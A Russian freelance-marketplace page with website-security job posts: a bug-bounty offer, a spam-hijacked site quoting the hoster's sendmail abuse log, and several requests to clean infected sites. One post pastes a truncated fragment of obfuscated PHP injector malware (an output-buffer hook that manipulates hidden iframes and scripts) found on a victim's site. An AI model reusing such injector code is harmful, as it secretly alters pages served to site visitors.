Привет все, я работаю в забугорной компании менеджером, они разработали систему приватного ключа. Её нужно проверить на уязвимость. Если вы найдёте уязвимость то Вам заплатят 1000долларов. Систему пока устанавливают.
Устранить уязвимости в сайте
Кто-то его взламывает и делает рассылку через него
Вот что написали хостеры
> Сервер vps-14.hoster.kz появился в системе мониторинга с сигналом о спаме.
> В результате проверки выяснили - аккаунт v-4446 производил массовую
> рассылку сообщений скриптом из
> /var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin :
> 2010-08-15 08:00:19
> cwd=/var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin 5
> args: /usr/sbin/sendmail -t -i -f [email protected]
> 2010-08-15 08:00:20
> cwd=/var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin 5
> args: /usr/sbin/sendmail -t -i -f [email protected]
> 2010-08-15 08:00:20
> cwd=/var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin 5
> args: /usr/sbin/sendmail -t -i -f [email protected]
> 2010-08-15 08:00:20
> cwd=/var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin 5
> args: /usr/sbin/sendmail -t -i -f [email protected]
> 2010-08-15 08:00:20
> cwd=/var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin 5
> args: /usr/sbin/sendmail -t -i -f [email protected]
>
>
> За 10 минут было отослано около 5000 сообщений.
> Обнулили права на папку
> /var/www/v-4446/data/www/finschool.kz/consult-help/sendmail/admin.
> Очистили спул от писем массовой рассылки.
> Пример содержания письма приложен.
Надо эту дырку закрыть как то
письма рекламирующие виагру
ася:пять шесть ноль шесть один шесть девять один семь (yakooobin)
Заявки фрилансеров
Похожие заказы
- $1000Тестирование сайтов6 заявокЗакрыт15 лет назад
Собственно нужно убрать вирус и усилить безопасность
Тестирование сайтов1 исполнительЗавершен15 лет назадНеобходимо протестировать скрипт и найти возможные "дыры" для взлома.
Тестирование сайтов8 заявокЗакрыт15 лет назадВ рамках другого нашего проекта (см. http://www.weblancer.net/projects/211029.html) мы хотели бы перед началом разработки игры протестировать один из подходов к защите кода флэш-игры от взлома. Речь идет о взломе до степени раскрытия логики игры и манипулирования ...
Тестирование сайтов2 заявкиЗакрыт15 лет назад- $150
Требуется написать аудит сайта. Подробности в личку
Тестирование сайтов1 исполнительЗавершен15 лет назад Сайт: www.cont.md Хостимся у www.Multihost.ru Сегодня пришло уведомление о превышение лимита на использование системных ресурсов. Письмо с отчётом во вложении. ТРЕБУЕТСЯ: провести анализ - выявить проблему и исправить. ...
Тестирование сайтов1 исполнительЗавершен15 лет назадЗдравствуйте! сегодня с утра обнаружил у себя на сайте вирус. происходит все с ридиректом . сайт грузится ,а через секунд пять ридирикт на порнуху. сайт biotema.ru Спасибо.
Тестирование сайтов1 исполнительЗавершен15 лет назад- $20
Добрый день. на сайте ( club ice berg . ru )обнаружены следующие вирусы + еще нашел зашифровыный в base64 такой код if(!function_exists('w5uw')){function w5uw($s){if(preg_match_all('##is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?#is','',$s);$s=str_replace($a=base64_decode(''),'',$s);if(stristr($s,'=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('w5uw');for($i=0;$i ...
Тестирование сайтов1 исполнительЗавершен15 лет назад Требуется опытный тестер безопастности. Выявление проблем кода и уязвимых мест сайта. Возможно внесение изменений, рекомендации по устранению уязвимостей. Предлагайте свои цены. сайт ...
Тестирование сайтов2 заявкиЗакрыт15 лет назад- $100
Добрый день Нужно сделать аудит сайта и дать советы по дизайну, контенту, структуер, Сео. Спасибо.
Тестирование сайтов8 заявокЗакрыт15 лет назад